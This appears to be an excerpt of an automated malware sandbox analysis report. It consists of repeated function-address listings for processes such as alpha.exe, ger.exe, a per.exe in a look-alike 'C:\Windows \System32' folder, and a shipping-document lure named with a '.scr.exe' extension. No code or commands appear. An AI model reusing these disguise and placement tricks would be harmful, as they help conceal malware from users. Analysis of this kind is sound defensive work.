Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC87854	5_2_00007FF70CC87854
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC9AC4C	5_2_00007FF70CC9AC4C
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC77D30	6_2_00007FF70CC77D30
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC85554	6_2_00007FF70CC85554
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC7AA54	6_2_00007FF70CC7AA54
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC837D8	6_2_00007FF70CC837D8
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC7CE10	6_2_00007FF70CC7CE10
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC78DF8	6_2_00007FF70CC78DF8
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC9D9D0	6_2_00007FF70CC9D9D0
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC781D4	6_2_00007FF70CC781D4
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CCA1538	6_2_00007FF70CCA1538
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC76EE4	6_2_00007FF70CC76EE4
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC97F00	6_2_00007FF70CC97F00
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC80A6C	6_2_00007FF70CC80A6C
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC9EE88	6_2_00007FF70CC9EE88
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC7E680	6_2_00007FF70CC7E680
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC9AA30	6_2_00007FF70CC9AA30
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC74A30	6_2_00007FF70CC74A30
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC84224	6_2_00007FF70CC84224
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC72220	6_2_00007FF70CC72220
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC7D250	6_2_00007FF70CC7D250
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC79E50	6_2_00007FF70CC79E50
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC77650	6_2_00007FF70CC77650
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC75240	6_2_00007FF70CC75240
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC76BE0	6_2_00007FF70CC76BE0
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC73410	6_2_00007FF70CC73410
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC9AFBC	6_2_00007FF70CC9AFBC
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC75B70	6_2_00007FF70CC75B70
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC73F90	6_2_00007FF70CC73F90
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC7372C	6_2_00007FF70CC7372C
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC79B50	6_2_00007FF70CC79B50
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC7B0D8	6_2_00007FF70CC7B0D8
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC78510	6_2_00007FF70CC78510
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC818D4	6_2_00007FF70CC818D4
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC71884	6_2_00007FF70CC71884
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC72C48	6_2_00007FF70CC72C48
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC87854	6_2_00007FF70CC87854
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC9AC4C	6_2_00007FF70CC9AC4C
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC85554	9_2_00007FF70CC85554
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC80A6C	9_2_00007FF70CC80A6C
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC84224	9_2_00007FF70CC84224
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC7AA54	9_2_00007FF70CC7AA54
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC837D8	9_2_00007FF70CC837D8
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC7CE10	9_2_00007FF70CC7CE10
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC78DF8	9_2_00007FF70CC78DF8
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC9D9D0	9_2_00007FF70CC9D9D0
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC781D4	9_2_00007FF70CC781D4
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC77D30	9_2_00007FF70CC77D30
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CCA1538	9_2_00007FF70CCA1538
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC76EE4	9_2_00007FF70CC76EE4
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC97F00	9_2_00007FF70CC97F00
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC9EE88	9_2_00007FF70CC9EE88
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC7E680	9_2_00007FF70CC7E680
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC9AA30	9_2_00007FF70CC9AA30
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC74A30	9_2_00007FF70CC74A30
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC72220	9_2_00007FF70CC72220
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC7D250	9_2_00007FF70CC7D250
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC79E50	9_2_00007FF70CC79E50
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC77650	9_2_00007FF70CC77650
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC75240	9_2_00007FF70CC75240
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC76BE0	9_2_00007FF70CC76BE0
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC73410	9_2_00007FF70CC73410
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC9AFBC	9_2_00007FF70CC9AFBC
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC75B70	9_2_00007FF70CC75B70
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC73F90	9_2_00007FF70CC73F90
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC7372C	9_2_00007FF70CC7372C
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC79B50	9_2_00007FF70CC79B50
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC7B0D8	9_2_00007FF70CC7B0D8
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC78510	9_2_00007FF70CC78510
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC818D4	9_2_00007FF70CC818D4
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC71884	9_2_00007FF70CC71884
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC72C48	9_2_00007FF70CC72C48
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC87854	9_2_00007FF70CC87854
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC9AC4C	9_2_00007FF70CC9AC4C
Source: C:\Users\Public\ger.exe	Code function: 16_2_00007FF7E0A36054	16_2_00007FF7E0A36054
Source: C:\Users\Public\ger.exe	Code function: 16_2_00007FF7E0A3596C	16_2_00007FF7E0A3596C
Source: C:\Users\Public\ger.exe	Code function: 16_2_00007FF7E0A31664	16_2_00007FF7E0A31664
Source: C:\Users\Public\ger.exe	Code function: 16_2_00007FF7E0A36EC8	16_2_00007FF7E0A36EC8
Source: C:\Users\Public\ger.exe	Code function: 16_2_00007FF7E0A372C0	16_2_00007FF7E0A372C0
Source: C:\Users\Public\ger.exe	Code function: 16_2_00007FF7E0A367A0	16_2_00007FF7E0A367A0
Source: C:\Users\Public\ger.exe	Code function: 16_2_00007FF7E0A36AE8	16_2_00007FF7E0A36AE8
Source: C:\Users\Public\ger.exe	Code function: 16_2_00007FF7E0A383D8	16_2_00007FF7E0A383D8
Source: C:\Users\Public\ger.exe	Code function: 16_2_00007FF7E0A34050	16_2_00007FF7E0A34050
Source: C:\Users\Public\ger.exe	Code function: 16_2_00007FF7E0A35128	16_2_00007FF7E0A35128
Source: C:\Users\Public\ger.exe	Code function: 16_2_00007FF7E0A34318	16_2_00007FF7E0A34318
Source: C:\Users\Public\ger.exe	Code function: 16_2_00007FF7E0A39890	16_2_00007FF7E0A39890
Source: C:\Users\Public\ger.exe	Code function: 16_2_00007FF7E0A37C7C	16_2_00007FF7E0A37C7C
Source: C:\Users\Public\ger.exe	Code function: 16_2_00007FF7E0A37670	16_2_00007FF7E0A37670
Source: C:\Users\Public\ger.exe	Code function: 16_2_00007FF7E0A32D70	16_2_00007FF7E0A32D70
Source: C:\Users\Public\ger.exe	Code function: 16_2_00007FF7E0A39C74	16_2_00007FF7E0A39C74
Source: C:\Windows \System32\per.exe	Code function: 17_2_00007FF6FEF91EF0	17_2_00007FF6FEF91EF0
Source: C:\Windows \System32\per.exe	Code function: 17_2_00007FF6FEF97D50	17_2_00007FF6FEF97D50
Source: C:\Windows \System32\per.exe	Code function: 17_2_00007FF6FEF93D60	17_2_00007FF6FEF93D60
Source: C:\Windows \System32\per.exe	Code function: 17_2_00007FF6FEF91358	17_2_00007FF6FEF91358
Source: C:\Windows \System32\per.exe	Code function: 17_2_00007FF6FEF9567C	17_2_00007FF6FEF9567C
Source: C:\Windows \System32\per.exe	Code function: 17_2_00007FF6FEF95B8C	17_2_00007FF6FEF95B8C
Source: C:\Windows \System32\per.exe	Code function: 17_2_00007FF6FEF930B0	17_2_00007FF6FEF930B0
Source: C:\Windows \System32\per.exe	Code function: 17_2_00007FF6FEF95114	17_2_00007FF6FEF95114
Source: C:\Windows \System32\per.exe	Code function: 17_2_00007FF6FEF97928	17_2_00007FF6FEF97928
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC78DF8	31_2_00007FF70CC78DF8
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC85554	31_2_00007FF70CC85554
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC7AA54	31_2_00007FF70CC7AA54
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC837D8	31_2_00007FF70CC837D8
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC73410	31_2_00007FF70CC73410
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC7CE10	31_2_00007FF70CC7CE10
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC9D9D0	31_2_00007FF70CC9D9D0
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC781D4	31_2_00007FF70CC781D4
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC77D30	31_2_00007FF70CC77D30
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CCA1538	31_2_00007FF70CCA1538
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC76EE4	31_2_00007FF70CC76EE4
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC97F00	31_2_00007FF70CC97F00
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC80A6C	31_2_00007FF70CC80A6C
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC9EE88	31_2_00007FF70CC9EE88
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC7E680	31_2_00007FF70CC7E680
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC9AA30	31_2_00007FF70CC9AA30
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC74A30	31_2_00007FF70CC74A30
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC84224	31_2_00007FF70CC84224
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC72220	31_2_00007FF70CC72220
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC7D250	31_2_00007FF70CC7D250
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC79E50	31_2_00007FF70CC79E50
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC77650	31_2_00007FF70CC77650
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC75240	31_2_00007FF70CC75240
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC76BE0	31_2_00007FF70CC76BE0
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC9AFBC	31_2_00007FF70CC9AFBC
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC75B70	31_2_00007FF70CC75B70
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC73F90	31_2_00007FF70CC73F90
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC7372C	31_2_00007FF70CC7372C
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC79B50	31_2_00007FF70CC79B50
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC7B0D8	31_2_00007FF70CC7B0D8
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC78510	31_2_00007FF70CC78510
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC818D4	31_2_00007FF70CC818D4
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC71884	31_2_00007FF70CC71884
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC72C48	31_2_00007FF70CC72C48
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC87854	31_2_00007FF70CC87854
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC9AC4C	31_2_00007FF70CC9AC4C
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC78DF8	32_2_00007FF70CC78DF8
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC85554	32_2_00007FF70CC85554
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC7AA54	32_2_00007FF70CC7AA54
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC837D8	32_2_00007FF70CC837D8
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC73410	32_2_00007FF70CC73410
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC87854	32_2_00007FF70CC87854
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC7CE10	32_2_00007FF70CC7CE10
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC9D9D0	32_2_00007FF70CC9D9D0
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC781D4	32_2_00007FF70CC781D4
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC77D30	32_2_00007FF70CC77D30
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CCA1538	32_2_00007FF70CCA1538
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC76EE4	32_2_00007FF70CC76EE4
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC97F00	32_2_00007FF70CC97F00
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC80A6C	32_2_00007FF70CC80A6C
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC9EE88	32_2_00007FF70CC9EE88
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC7E680	32_2_00007FF70CC7E680
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC9AA30	32_2_00007FF70CC9AA30
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC74A30	32_2_00007FF70CC74A30
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC84224	32_2_00007FF70CC84224
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC72220	32_2_00007FF70CC72220
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC7D250	32_2_00007FF70CC7D250
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC79E50	32_2_00007FF70CC79E50
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC77650	32_2_00007FF70CC77650
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC75240	32_2_00007FF70CC75240
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC76BE0	32_2_00007FF70CC76BE0
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC9AFBC	32_2_00007FF70CC9AFBC
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC75B70	32_2_00007FF70CC75B70
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC73F90	32_2_00007FF70CC73F90
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC7372C	32_2_00007FF70CC7372C
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC79B50	32_2_00007FF70CC79B50
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC7B0D8	32_2_00007FF70CC7B0D8
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC78510	32_2_00007FF70CC78510
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC818D4	32_2_00007FF70CC818D4
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC71884	32_2_00007FF70CC71884
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC72C48	32_2_00007FF70CC72C48
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC9AC4C	32_2_00007FF70CC9AC4C
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC78DF8	34_2_00007FF70CC78DF8
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC85554	34_2_00007FF70CC85554
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC7AA54	34_2_00007FF70CC7AA54
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC837D8	34_2_00007FF70CC837D8
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC73410	34_2_00007FF70CC73410
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC87854	34_2_00007FF70CC87854
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC7CE10	34_2_00007FF70CC7CE10
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC9D9D0	34_2_00007FF70CC9D9D0
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC781D4	34_2_00007FF70CC781D4
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC77D30	34_2_00007FF70CC77D30
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CCA1538	34_2_00007FF70CCA1538
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC76EE4	34_2_00007FF70CC76EE4
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC97F00	34_2_00007FF70CC97F00
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC80A6C	34_2_00007FF70CC80A6C
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC9EE88	34_2_00007FF70CC9EE88
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC7E680	34_2_00007FF70CC7E680
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC9AA30	34_2_00007FF70CC9AA30
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC74A30	34_2_00007FF70CC74A30
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC84224	34_2_00007FF70CC84224
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC72220	34_2_00007FF70CC72220
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC7D250	34_2_00007FF70CC7D250
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC79E50	34_2_00007FF70CC79E50
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC77650	34_2_00007FF70CC77650
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC75240	34_2_00007FF70CC75240
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC76BE0	34_2_00007FF70CC76BE0
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC9AFBC	34_2_00007FF70CC9AFBC
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC75B70	34_2_00007FF70CC75B70
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC73F90	34_2_00007FF70CC73F90
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC7372C	34_2_00007FF70CC7372C
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC79B50	34_2_00007FF70CC79B50
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC7B0D8	34_2_00007FF70CC7B0D8
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC78510	34_2_00007FF70CC78510
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC818D4	34_2_00007FF70CC818D4
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC71884	34_2_00007FF70CC71884
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC72C48	34_2_00007FF70CC72C48
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC9AC4C	34_2_00007FF70CC9AC4C
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_0044B040	36_2_0044B040
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_0043610D	36_2_0043610D
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_00447310	36_2_00447310
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_0044A490	36_2_0044A490
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_0040755A	36_2_0040755A
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_0043C560	36_2_0043C560
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_0044B610	36_2_0044B610
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_0044D6C0	36_2_0044D6C0
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_004476F0	36_2_004476F0
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_0044B870	36_2_0044B870
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_0044081D	36_2_0044081D
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_00414957	36_2_00414957
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_004079EE	36_2_004079EE
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_00407AEB	36_2_00407AEB
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_0044AA80	36_2_0044AA80
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_00412AA9	36_2_00412AA9
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_00404B74	36_2_00404B74
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_00404B03	36_2_00404B03
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_0044BBD8	36_2_0044BBD8
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_00404BE5	36_2_00404BE5
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_00404C76	36_2_00404C76
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_00415CFE	36_2_00415CFE
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_00416D72	36_2_00416D72
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_00446D30	36_2_00446D30
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_00446D8B	36_2_00446D8B
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_00406E8F	36_2_00406E8F
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 37_2_00405038	37_2_00405038
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 37_2_0041208C	37_2_0041208C
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 37_2_004050A9	37_2_004050A9
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 37_2_0040511A	37_2_0040511A
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 37_2_0043C13A	37_2_0043C13A
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 37_2_004051AB	37_2_004051AB
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 37_2_00449300	37_2_00449300
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 37_2_0040D322	37_2_0040D322
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 37_2_0044A4F0	37_2_0044A4F0
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 37_2_0043A5AB	37_2_0043A5AB
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 37_2_00413631	37_2_00413631
